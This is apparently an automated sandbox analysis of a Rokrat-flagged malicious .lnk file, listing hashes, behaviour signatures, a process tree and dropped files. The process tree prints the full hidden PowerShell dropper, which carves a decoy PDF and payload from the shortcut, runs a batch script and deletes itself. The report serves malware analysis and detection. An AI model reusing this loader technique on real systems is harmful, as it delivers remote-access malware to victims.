Analysis

  • max time kernel
    32s
  • max time network
    38s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    22-02-2024 18:44

General

  • Target

    3.lnk

  • Size

    52.0MB

  • MD5

    acf4085b2fa977fc1350f0ddc2710502

  • SHA1

    7155d89bae9acd67f5d8cdf651b73ee6b54262c3

  • SHA256

    cbc777d1e018832790482e6fd82ab186ac02036c231f10064b14ff1d81832f13

  • SHA512

    4aa010f680485f0241cbaff77d3a21509e2f73c4fdfe1940aa63f46949fcb39404e4a2c543c465098806b7059fab234de48fe9996ba1edd9c4a9b7b6ca1dbe70

  • SSDEEP

    24576:0Zthnqtka+Dj8bI6c94TuDjoZgRXTTYdy830QtO0oIJjW7sFAc1Mh5D2y8:U9OQj85c91wZgjbaJa7d2y8

Score
10/10

Malware Config

Signatures

  • Detect Rokrat payload 2 IoCs
  • Rokrat

    Rokrat is a remote access trojan written in c++.

  • Blocklisted process makes network request 3 IoCs
  • Checks BIOS information in registry 2 TTPs 1 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Deletes itself 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\3.lnk
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1772
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\SysWOW64\cmd.exe" /k for /f "tokens=*" %a in ('dir C:\Windows\SysWow64\WindowsPowerShell\v1.0\*rshell.exe /s /b /od') do call %a "$t1 = 'user32.dll';$t = 'using System; using System.Runtime.InteropServices; public class User32 {[DllImport(' + [System.Text.Encoding]::UTF8.GetString(34) + $t1 + [System.Text.Encoding]::UTF8.GetString(34) + ', SetLastError = true)]public static extern IntPtr FindWindow(string lpClassName, string lpWindowName);[DllImport(' + [System.Text.Encoding]::UTF8.GetString(34) + $t1 + [System.Text.Encoding]::UTF8.GetString(34) + ')] [return: MarshalAs(UnmanagedType.Bool)] public static extern bool ShowWindow(IntPtr hWnd, int nCmdShow); }'; Add-Type -TypeDefinition $t;$proName = 'powershell.exe'; $cmdMainWindowHandle = [User32]::FindWindow([NullString]::Value, $proName);[User32]::ShowWindow($cmdMainWindowHandle, 0);$dirPath = Get-Location; if($dirPath -Match 'System32' -or $dirPath -Match 'Program Files') {$dirPath = 'C:\Users\Admin\AppData\Local\Temp'}; $lnkPath = Get-ChildItem -Path $dirPath -Recurse *.lnk | where-object {$_.length -eq 0x03401DD6} | Select-Object -ExpandProperty FullName;$lnkFile=New-Object System.IO.FileStream($lnkPath, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read);$lnkFile.Seek(0x0000162C, [System.IO.SeekOrigin]::Begin);$pdfFile=New-Object byte[] 0x0007EEC5;$lnkFile.Read($pdfFile, 0, 0x0007EEC5);$pdfPath = $lnkPath.replace('.lnk','.pdf');sc $pdfPath $pdfFile -Encoding Byte;& $pdfPath;$lnkFile.Seek(0x000804F1,[System.IO.SeekOrigin]::Begin);$exeFile=New-Object byte[] 0x000D9402;$lnkFile.Read($exeFile, 0, 0x000D9402);$exePath=$env:public+'\'+'public.dat';sc $exePath $exeFile -Encoding Byte;$lnkFile.Seek(0x001598F3,[System.IO.SeekOrigin]::Begin);$stringByte = New-Object byte[] 0x000005AA;$lnkFile.Read($stringByte, 0, 0x000005AA);$batStrPath = $env:temp+'\'+'temp.dat';$string = [System.Text.Encoding]::UTF8.GetString($stringByte);$string | Out-File -FilePath $batStrPath -Encoding ascii;$lnkFile.Seek(0x00159E9D,[System.IO.SeekOrigin]::Begin);$batByte = New-Object byte[] 0x00000135;$lnkFile.Read($batByte, 0, 0x00000135);$executePath = $env:temp+'\'+'working.bat';Write-Host $executePath;Write-Host $batStrPath;$bastString = [System.Text.Encoding]::UTF8.GetString($batByte);$bastString | Out-File -FilePath $executePath -Encoding ascii;& $executePath;$lnkFile.Close();remove-item -path $lnkPath -force;"&& exit
      2⤵
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Suspicious use of WriteProcessMemory
      PID:2656
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c dir C:\Windows\SysWow64\WindowsPowerShell\v1.0\*rshell.exe /s /b /od
        3⤵
          PID:2640
        • C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe
          C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe "$t1 = 'user32.dll';$t = 'using System; using System.Runtime.InteropServices; public class User32 {[DllImport(' + [System.Text.Encoding]::UTF8.GetString(34) + $t1 + [System.Text.Encoding]::UTF8.GetString(34) + ', SetLastError = true)]public static extern IntPtr FindWindow(string lpClassName, string lpWindowName);[DllImport(' + [System.Text.Encoding]::UTF8.GetString(34) + $t1 + [System.Text.Encoding]::UTF8.GetString(34) + ')] [return: MarshalAs(UnmanagedType.Bool)] public static extern bool ShowWindow(IntPtr hWnd, int nCmdShow); }'; Add-Type -TypeDefinition $t;$proName = 'powershell.exe'; $cmdMainWindowHandle = [User32]::FindWindow([NullString]::Value, $proName);[User32]::ShowWindow($cmdMainWindowHandle, 0);$dirPath = Get-Location; if($dirPath -Match 'System32' -or $dirPath -Match 'Program Files') {$dirPath = 'C:\Users\Admin\AppData\Local\Temp'}; $lnkPath = Get-ChildItem -Path $dirPath -Recurse *.lnk | where-object {$_.length -eq 0x03401DD6} | Select-Object -ExpandProperty FullName;$lnkFile=New-Object System.IO.FileStream($lnkPath, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read);$lnkFile.Seek(0x0000162C, [System.IO.SeekOrigin]::Begin);$pdfFile=New-Object byte[] 0x0007EEC5;$lnkFile.Read($pdfFile, 0, 0x0007EEC5);$pdfPath = $lnkPath.replace('.lnk','.pdf');sc $pdfPath $pdfFile -Encoding Byte;& $pdfPath;$lnkFile.Seek(0x000804F1,[System.IO.SeekOrigin]::Begin);$exeFile=New-Object byte[] 0x000D9402;$lnkFile.Read($exeFile, 0, 0x000D9402);$exePath=$env:public+'\'+'public.dat';sc $exePath $exeFile -Encoding Byte;$lnkFile.Seek(0x001598F3,[System.IO.SeekOrigin]::Begin);$stringByte = New-Object byte[] 0x000005AA;$lnkFile.Read($stringByte, 0, 0x000005AA);$batStrPath = $env:temp+'\'+'temp.dat';$string = [System.Text.Encoding]::UTF8.GetString($stringByte);$string | Out-File -FilePath $batStrPath -Encoding ascii;$lnkFile.Seek(0x00159E9D,[System.IO.SeekOrigin]::Begin);$batByte = New-Object byte[] 0x00000135;$lnkFile.Read($batByte, 0, 0x00000135);$executePath = $env:temp+'\'+'working.bat';Write-Host $executePath;Write-Host $batStrPath;$bastString = [System.Text.Encoding]::UTF8.GetString($batByte);$bastString | Out-File -FilePath $executePath -Encoding ascii;& $executePath;$lnkFile.Close();remove-item -path $lnkPath -force;"
          3⤵
          • Deletes itself
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2580
          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
            "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\d3vw-tiu.cmdline"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:2592
            • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
              C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA5F1.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCA5E0.tmp"
              5⤵
                PID:2676
            • C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
              "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\3.pdf"
              4⤵
              • Suspicious use of SetWindowsHookEx
              PID:2544
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c ""C:\Users\Admin\AppData\Local\Temp\working.bat""
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:840
              • C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe
                C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden "$stringPath=$env:temp+'\'+'temp.dat';$stringByte = Get-Content -path $stringPath -encoding byte;$string = [System.Text.Encoding]::UTF8.GetString($stringByte);$scriptBlock = [scriptblock]::Create($string);&$scriptBlock;"
                5⤵
                • Blocklisted process makes network request
                • Checks BIOS information in registry
                • Drops file in Windows directory
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:2236
                • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
                  "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\fk3r_t92.cmdline"
                  6⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2016
                  • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
                    C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESEC34.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCEC23.tmp"
                    7⤵
                      PID:2520
                  • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
                    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\voo77hyq.cmdline"
                    6⤵
                    • Suspicious use of WriteProcessMemory
                    PID:1924
                    • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
                      C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESECEF.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCECEE.tmp"
                      7⤵
                        PID:2132
                    • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
                      "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ulf0jg5o.cmdline"
                      6⤵
                      • Suspicious use of WriteProcessMemory
                      PID:588
                      • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
                        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESEDBA.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCEDB9.tmp"
                        7⤵
                          PID:776
                      • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
                        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ny4-9awv.cmdline"
                        6⤵
                        • Suspicious use of WriteProcessMemory
                        PID:520
                        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
                          C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESEEF2.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCEEE1.tmp"
                          7⤵
                            PID:1216

              Network

              MITRE ATT&CK Enterprise v15

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Users\Admin\AppData\Local\Temp\3.pdf

                Filesize

                507KB

                MD5

                4de5eec4a8b227b451b7209d7ec1f0f4

                SHA1

                e5d41b955fcd2b2187d63e17246db392c16612a8

                SHA256

                14e507f2160b415d8aae1bbe4e5fbcf0a10563a72bb53b7d8a9fc339518bc668

                SHA512

                d523736cd2238c49e9b2ca6da284180772959a39bf8524f6c227013630c7dd030f61a40e64722c2540225231985435838ee4c584474b33ede2cfc1c4671c17b1

              • C:\Users\Admin\AppData\Local\Temp\Cab6B7.tmp

                Filesize

                65KB

                MD5

                ac05d27423a85adc1622c714f2cb6184

                SHA1

                b0fe2b1abddb97837ea0195be70ab2ff14d43198

                SHA256

                c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

                SHA512

                6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

              • C:\Users\Admin\AppData\Local\Temp\RESA5F1.tmp

                Filesize

                1KB

                MD5

                4caba71cf260fe69d141991ca20c9c48

                SHA1

                7db0365f42057104f922856f43e59e8f0ff8c501

                SHA256

                19a834185104084b8d54b8d72f09164a93ed13d00ba0b55761a7030c9ca3a6f9

                SHA512

                3ac96816f64f1698a9cf682677f028c32791e2955c0bc84f13f4b1f45810432ca30047e2e3c9f70867bc768cbee6c2cb4defe680ea1b696a88a69ce319015fc1

              • C:\Users\Admin\AppData\Local\Temp\RESEC34.tmp

                Filesize

                1KB

                MD5

                cda05d137cfefd56c61359cf1491b2ed

                SHA1

                b8a89ad681183d12d6a619de48aa8d539c0504c7

                SHA256

                5e20584a757beab0c848cb13f259f18810d70e64da19262f45bd3d3518dd5ba9

                SHA512

                6380150629368ba5db92b0ceb8ad75d5cec3632b793ac9a1ff47316803c21316e170d6a86e432e5a83cbc20f61c54a19bd117dfb2d113132106551c6d2843701

              • C:\Users\Admin\AppData\Local\Temp\RESECEF.tmp

                Filesize

                1KB

                MD5

                38613573354d2e30ffbbeb7603d72106

                SHA1

                4be9ff7b1d118bfe9e8e70b58b7f4a743bb74479

                SHA256

                736048c476f1e8cb1d982f3ab042dbd67ae0968c868c93a02818a21ea08f58db

                SHA512

                520867dff6d692bab1b81af2b9af0e9a1b3d0027f2de126536f74b8d3bd8505d988a5cd1c20fc80edc30bb655bf031077905f7cc35f45a6e3ff94b2895f34ce1

              • C:\Users\Admin\AppData\Local\Temp\RESEDBA.tmp

                Filesize

                1KB

                MD5

                2524b06bc365f9497c686ab4f7c1bcaf

                SHA1

                e8eefc142bfe98924f2399d1d8028718dc23ef2e

                SHA256

                5a365617416c769fa26278899df70e6e7e66f3adec3aedf68e385b48b173c52a

                SHA512

                8796d74883f52d837b2cc4c46a7c43e2330e2e6c1d3d9fa27c33a33a14fc8d9cdd426f0f5fc21b6c8152d70dda9b2d108d5df7be531cef9bd645b41703b41f85

              • C:\Users\Admin\AppData\Local\Temp\RESEEF2.tmp

                Filesize

                1KB

                MD5

                9f015dd63a71f2b4f791b65607742c13

                SHA1

                6db31dd9fa7a2c8d5b2928225b155cdcd9efd960

                SHA256

                6bf21017e3af0c59f9d0a1e3313741f3684ba64d71c73c7e4387f62a15a2e594

                SHA512

                1efdfbe0e54fd7458608f574f473db28712292cc31d6f62ea66268b2103bb7f1692d7e61457e70e148acaeb0c9ad6b8b96b07fe8bf55033f261bd7e5f9e5f92a

              • C:\Users\Admin\AppData\Local\Temp\Tar6F8.tmp

                Filesize

                76KB

                MD5

                805addccf327370cfff55b5ebffbf6fc

                SHA1

                7cc90520067be5f66702a1df54281ceb880e81d9

                SHA256

                95238a96c563642a0e2a8b2c5b8dbf9d573501cdd163cfab028492796ac9eb69

                SHA512

                b35366025ace368440d1775a049d8ef3bbc193175364ffb227ca00cb4b56479e55e87574ef1744461fc8861c8c77a813d8e9f9a498653efea8c4abd11a229ae4

              • C:\Users\Admin\AppData\Local\Temp\d3vw-tiu.dll

                Filesize

                3KB

                MD5

                c1c84e84cac8698c7a96246f22627542

                SHA1

                c6cfc884b64aebc39299ef6a05ab3902ab67ec03

                SHA256

                2762868e48e124232635acbcf61cafe0501f16d613eea6e10a1ef029afcdf4fe

                SHA512

                93d328c4eabedb98ae2ffbbcc50afd7855bdb260e8441a872840d226929387e743cdfcd87d85eec49506ceef42fe1812c4dbd72da49831608044b884f481f169

              • C:\Users\Admin\AppData\Local\Temp\d3vw-tiu.pdb

                Filesize

                7KB

                MD5

                18e7f9fa7b3f451c51d47810ab130efc

                SHA1

                fad67737327352abbdb8b3916e7c815d0443f6fc

                SHA256

                384f5dc4903d34bb8a3642839e6309977bdf4ee057ce3a18adb6dce9b8a41667

                SHA512

                69c1d2c8b939130afeb5332034d9e290811698bdc9d9c17e851a7cd0fcc2e993982e7b1340ce047fc82f5bca7da53565e84040a43837a503b63c9f2861422d50

              • C:\Users\Admin\AppData\Local\Temp\fk3r_t92.dll

                Filesize

                3KB

                MD5

                ad5bcd2748f31e967528d383907b69b6

                SHA1

                f0f24129f9e9dcbe5324f7761740b9398e3c2e2a

                SHA256

                00c7a284a706ec2f34188106cfdf5d5a6fa04ded23d517497d38b47cfbf6d983

                SHA512

                223c757672d6be420527b094afa57d9519168503c4d8baf3a4dd97c81b6c20762795887cca709f41e4be2a454aaf6b75cfc5af305c659893fe1ccb333c6f5e38

              • C:\Users\Admin\AppData\Local\Temp\fk3r_t92.pdb

                Filesize

                7KB

                MD5

                eef3fc3a3058f3f55c2a6f19e9144fb2

                SHA1

                64f998487fb187c073b3f5af33053641c51c9bbc

                SHA256

                a08f2201678d58b42cd6dffed739563412e6af733cc663916ed5eb134f352705

                SHA512

                d5f0ef3f132647fb9fc0d7e3a6955ade781b306874eccfd58b2161f50da7ec8c2b3fd047c9dfed0975252efb02666601a08df6abfcfef09f76a0dce51c77df10

              • C:\Users\Admin\AppData\Local\Temp\ny4-9awv.dll

                Filesize

                3KB

                MD5

                7407b098626e76234963b4b9208a6674

                SHA1

                631db1f222d482124fc982c29f246839c9647c38

                SHA256

                f442e176ceaa558e007fb0d812227fad5fe5989978769d4edc010a4af1c20896

                SHA512

                735d4e05eadb9505b4740c03ef01e93645d76420a3815e47dd0ef505c183ffc98b82e0c2077cf73791e55d38f5ff1ebd7fe15b7fa528c0e301a3636488a05bae

              • C:\Users\Admin\AppData\Local\Temp\ny4-9awv.pdb

                Filesize

                7KB

                MD5

                c9866bc5af04397eac03d6128909d70b

                SHA1

                cad4ad723a7e8c15989f26287f87fe81b6ff0f61

                SHA256

                e9cfedf11a97e2541a4bedba0a93d6059f166ef4e5903606959f7e7a3d21fab0

                SHA512

                2964fc5ee72351dbd88de7f5a65f768d4786f66a7b6655a71758a2eb0709ac08fa18d70903a47fc1fb167255fa5a59c915f48639b146bc1a2cc328c13d9c18eb

              • C:\Users\Admin\AppData\Local\Temp\temp.dat

                Filesize

                1KB

                MD5

                78480139d86520ba82766c5b3c9a7479

                SHA1

                436e5aa0ef8c97a0b78a4289d19860c1ab8c1f1a

                SHA256

                85438bc7af4c48130c1fd51f8a02eb13b8d57b983411b15fa7f03a302e8e6d8c

                SHA512

                bc5ce718cf3330ab56a131e874785bd86eef4aa19281d3225401f9e33b798dac6cb6e3e58ba2780d9f3a223a7e16e50f1f64a01d03e1b6e78ea56778cfd449d6

              • C:\Users\Admin\AppData\Local\Temp\ulf0jg5o.dll

                Filesize

                3KB

                MD5

                2e462cd617acd84d4331d75b4048102f

                SHA1

                298f2337284337f4ce31d153222be05dfa56e749

                SHA256

                199bbd10f0aa0bf847524806a64f90ebfe6d5454a772959f513243190b6debc8

                SHA512

                074d239e6ea4511a4f1b4f5c2645adbc665c6b3420c72f9852a762a85a65fac08253c1101a75372588757d82108a181863832410eae75529285137702a2b1a31

              • C:\Users\Admin\AppData\Local\Temp\ulf0jg5o.pdb

                Filesize

                7KB

                MD5

                4ba2c36953f511debc97770362b0aef9

                SHA1

                5816600fa87c53b26bf71f3594a856c3cf3e4313

                SHA256

                8c791610aa10e3b6f073c61646f24afb1095177cc9462118ff02d279583e2946

                SHA512

                22515c098318558c1304ad0742cade704807be2bfbc7470eeca95e75b759e2f2fedaa2f0f2df51d70aaf798bd721802cf422abbe8ae44a51e911c04fdb20da7a

              • C:\Users\Admin\AppData\Local\Temp\voo77hyq.dll

                Filesize

                3KB

                MD5

                df4f0f0daecb9d2479540fbce57c3652

                SHA1

                c5cd175262452b60513c7933b3289b332e0ee5c8

                SHA256

                0d3dfb6c3c55c37203c3c5b975506484810bfdf73c736405d15035d5044c2dda

                SHA512

                8866602d222ad70d93a3ce6e1fa247a48fc3fccd8fe23f06f2aed87d78ab39bce9f47a27321ff6bdefaa484c94526caad0906c51c4ca2d4b3b2d30722e8bee35

              • C:\Users\Admin\AppData\Local\Temp\voo77hyq.pdb

                Filesize

                7KB

                MD5

                f6bb7be63ba88cf9769375ab68b28388

                SHA1

                0c976dc400bb1dfdf48091ec07beb0e14b23661d

                SHA256

                5c6a6a5bc28f026c3e00e96f6997e6cf956a9f3b64d01551619fd87fb8e55d39

                SHA512

                773d0799e4bb3550181285a9abc59fb36823fbd3fdc9f9e76609fcd5f247adc0d3eb4fb69eddf45806b17df1ef8d425a77905a01a34383dfb6cfa1ce7dd02abd

              • C:\Users\Admin\AppData\Local\Temp\working.bat

                Filesize

                311B

                MD5

                a1640eb8f424ebe13b94955f8d0f6843

                SHA1

                8551e56c3e19861dbcae87f83b6d0ab225c3793d

                SHA256

                6c0b21b211ba77b42631e1a2a010f858b8664a8bd0149573596a8cdd72e7c399

                SHA512

                6b40b95ac1979a81ed44f991375dc94fda64b872c79c18111d72210a24867811d925acae4b87d378bd9f1adc86cb9adcf359ff873be7e4579869bd7418d466c8

              • C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents

                Filesize

                3KB

                MD5

                e1df9d033f0b954036ea6eb2880ddb61

                SHA1

                8c558d214cb5ea56dc11ef68387b2f4652b8de99

                SHA256

                af1c824b4d06c378e633518dd0cb5fdc68e0e73d26bfab02ef2d19da99ccf6a4

                SHA512

                39a670b329ccc3db035e639a86e2084f0cb81d4e534da60e9544200c9ebf2155813988bbbc5900f9118c6698da11a43bbc15c6819d7365548eb4b8eee6106b12

              • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

                Filesize

                7KB

                MD5

                d506c6f77d77957d15b946afbc523651

                SHA1

                e360b092e73b7b459f93a5634308cf828120a489

                SHA256

                8b6862cd4d2f40c4cc980f48dcf5b382d7de1fc5034ea46a29fb3bb0d7be73b1

                SHA512

                897bfe689552a41458c4f00add581ed4475497b238d367a79db54f42f787ecd3c1d908333b3cbb062f85bf57baae71c459f292790b5da4ecea30a6536c73937a

              • C:\Users\Public\public.dat

                Filesize

                869KB

                MD5

                9417ce8a0c32566089345659cbb67cbc

                SHA1

                3210434166466265e1c46321a395500229357fd2

                SHA256

                f3d98b1638dbe6fd0f97ae3b1d2c9d5c0f592baa1317c862042e5201a1e14aed

                SHA512

                fade97b0c65a693ed4aa270debb5604cee76f64a178e45a65ea71ac9e327bac153356960f229591035754f11cbc4bfea78531cb6a74a3320ce40779a352fd24f

              • \??\c:\Users\Admin\AppData\Local\Temp\CSCA5E0.tmp

                Filesize

                652B

                MD5

                373592dbaf314eab0f39402862e0ec58

                SHA1

                a547f6c6ccc561d4024c4fd2c58256b6e9bf692e

                SHA256

                ab1d317b828f0a6f3e56d09eafd99b290653f3a5328d0f1ad53b047b2cced3f8

                SHA512

                914a2fa65b68fbfdd3d341563f936e774c48b76397d46be550afd0c2b540f2eb669c3d48866139ed1eb4d2b0ce32af0f098eab758a56d10999c284d6c1d7963a

              • \??\c:\Users\Admin\AppData\Local\Temp\CSCEC23.tmp

                Filesize

                652B

                MD5

                83b58787ec2672fd57e49ee2b8a69eee

                SHA1

                16e16b0f439f22dbd52b69234ada4fd53d7552bf

                SHA256

                ead25760b9f09faea94d09818648652eda801c672afce4d704cea311e87357c3

                SHA512

                c52e404db55bf444dfb1c8e9fccce87e9dbdf4020d1e850408ab6bbe987854b165ad181ab5a197817145bc9653e9ce12b500adedd07981c4972adb3e4b0ca51f

              • \??\c:\Users\Admin\AppData\Local\Temp\CSCECEE.tmp

                Filesize

                652B

                MD5

                b4ef337ebbb953eaca76bf8f5a4e8f07

                SHA1

                ab21567b17531e1b0093360e2cda3fe8c45f7525

                SHA256

                e812097896576aa29dbe72c56b1178a00c7cdf888b56aa7ea22eeaab575f3064

                SHA512

                a205dc7de30391b162c8272db6b4425d8d868e8f65f4e91bbe8513563d8d43a49627d3a76fde3b2bb316e4b9d933ad7f310034d9b1aefbd95c4063545a895f4b

              • \??\c:\Users\Admin\AppData\Local\Temp\CSCEDB9.tmp

                Filesize

                652B

                MD5

                302596e22e1b81b07bba76236f886758

                SHA1

                3a2a7361c09e2a7f507f49df322c50fb1450ccf2

                SHA256

                1a7b1399448e7c411d8bcb3f51f10ec2c88a2adc6302727c23fe2db5af9318ac

                SHA512

                702ce37432dfceb7738b797b16ae747536cdae7467166f275e21359ed0f3c985779a0db69cf49250bef131711c1995b0374093556df32469266fe23ae1ac5195

              • \??\c:\Users\Admin\AppData\Local\Temp\CSCEEE1.tmp

                Filesize

                652B

                MD5

                bda9dbe19c386a87452cefc9d1b6ae62

                SHA1

                a0848e8221f060f28c1e09b0a5ec086b636f79e6

                SHA256

                0d86bdef37117d0cc005d12435d50d548fd805258698b2f181c7ecf54cd9e6a0

                SHA512

                dfa7aef89abe56af28a14d3db40114dfb8f07b43a4683f58373044e1f49772c0360d601db5637bcf3210625e16656d30e6eb2f552317d0a5dad489bd8b7bfa4c

              • \??\c:\Users\Admin\AppData\Local\Temp\d3vw-tiu.0.cs

                Filesize

                334B

                MD5

                60a1152ec32b816b91530c7814deaacd

                SHA1

                68f979631b0485aaae41203c4b14f9ce710dbd6f

                SHA256

                e4ec47a88eab9b07792d97b02ce1724cb45118860e8156bdeb9f7268b0c258d2

                SHA512

                58de87e6877b5495a250b8af6117a29fd32ae169086f37ad640a2b8eac6500b62daf0340410094765984381025bcdde750bd250088d3e4840f7aa72e9459eb65

              • \??\c:\Users\Admin\AppData\Local\Temp\d3vw-tiu.cmdline

                Filesize

                309B

                MD5

                a016cbc1f579a7b261828f56979a1654

                SHA1

                1892dd1fc60ae8c3416723068be08eb5bad7ddf6

                SHA256

                b15cafed5cba8eedbbb33f8edd6ba578a0cef69beb8e9868e2ef0217363f059e

                SHA512

                1e937793e3596a066e7d2e8615319b8879cb5d068cb24d3fbeda38622b847bc902e33c6565e75b423cd3223ee16f8641a7a6e3608ea17953789e0d26811e2c85

              • \??\c:\Users\Admin\AppData\Local\Temp\fk3r_t92.0.cs

                Filesize

                249B

                MD5

                69ecfeb3e9a8fb7890d114ec056ffd6d

                SHA1

                cba5334d2ffe24c60ef793a3f6a7f08067a913db

                SHA256

                0a913fd594ad2da3159400fc3d7d2cc50b34f8f31675ec5ac5a41d7e79e9fd58

                SHA512

                be7eb5a6a8bcc7f279aee00ad650aa872fc7fc08227eedeb9cc0a4273f0382b91306f60878728eaba3c79fa8c96066b144ecea897360a11be38996f04fdd99e1

              • \??\c:\Users\Admin\AppData\Local\Temp\fk3r_t92.cmdline

                Filesize

                309B

                MD5

                95ffc5590b10f09d2a7f14b151e58f3c

                SHA1

                875ea1c72b512dc949a44dcce3d9371a9bf6b7c6

                SHA256

                6ab8a4aa3d5062079e80a930028eaa9a698c799f543d4ccf1e7f0bce373cf9dc

                SHA512

                7107fb8f41c7bb5a8beb525f2d7e5ca5d43c58eb2a08552b704c8a7f21e72b102c5135d9980a7e9de563e82312bdc8e67522cd1a393b9d6c0efc03e409604514

              • \??\c:\Users\Admin\AppData\Local\Temp\ny4-9awv.0.cs

                Filesize

                259B

                MD5

                560e1b883a997afcfa3b73d8a5cddbc1

                SHA1

                2905f3f296ac3c7d6a020fb61f0819dbea2f1569

                SHA256

                e5231270257f1727ca127b669a7c21d46ced81cd5b46e89c48dd8304c1185bea

                SHA512

                041dd231b93708d4ad65580ea0fa7cff34a9a43ff8d3ae45b631a381e01dc286607aec05b1aade537818d068ca0b576cac613fde626d60eb2e4e6c3c0f525635

              • \??\c:\Users\Admin\AppData\Local\Temp\ny4-9awv.cmdline

                Filesize

                309B

                MD5

                c4b1ea98bcd0bc3cf59e36d336341296

                SHA1

                3d2f19e55cbf5e3b89c9951f2d2d6fb1a34a33f1

                SHA256

                7f73a7facefcdc5f8f7e2fd9016fde0cc3ded21edafd8bb2f9ffa19be0e41471

                SHA512

                93a136a82fd933cbff539b4dfbe34b3b1cf70b8f1f0d265dc5f1b3c5d8443773e3c6239a4d835a8f9d30eac8ff13061433fd1b230b5a3faa370cb0144cd4f350

              • \??\c:\Users\Admin\AppData\Local\Temp\ulf0jg5o.0.cs

                Filesize

                286B

                MD5

                b23df8158ffd79f95b9bddd18738270b

                SHA1

                79e81bb74bc53671aeabecae224f0f9fe0e3ed7f

                SHA256

                856bded4416dd1595613354334ad1d3e5c4922a86102786429bcdb0e7f798882

                SHA512

                e23822d5b9a32d7fc705b772ef43bcb336e201ec9c1d2507a530e8b1b383b0727c0b53b92e881a953527e7b2ffb485e24c1161834c9380d1bb7498eac7e4a67f

              • \??\c:\Users\Admin\AppData\Local\Temp\ulf0jg5o.cmdline

                Filesize

                309B

                MD5

                8d6a18360f099bf7af8a41a1d29d7f1b

                SHA1

                173ac07a6122d4c5a9b06b06c972a4adae391713

                SHA256

                b8077570111a86454f1e1a8b94c8a173475a27beeb6bf7354d637526e1ead2f0

                SHA512

